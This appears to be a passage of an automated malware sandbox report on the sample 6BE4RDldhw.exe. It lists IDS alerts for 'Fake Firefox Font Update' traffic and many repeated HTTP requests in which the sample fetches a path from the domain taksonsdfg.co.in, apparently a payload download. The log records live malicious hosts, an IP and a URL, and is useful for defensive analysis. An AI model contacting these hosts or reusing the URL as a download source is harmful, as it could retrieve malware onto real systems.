Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49994 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49998 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50007 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50012 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50019 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50024 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50031 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50033 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50042 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50046 -> 108.170.55.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50052 -> 108.170.55.202:443

Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in

Source: global traffic

DNS traffic detected: DNS query: taksonsdfg.co.in

Source: 6BE4RDldhw.exe, 6BE4RDldhw.exe, 00000000.00000002.2598433621.000000007FA30000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2583380707.0000000002CD3000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1333431137.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1333810883.000000007F8EF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.pmail.com
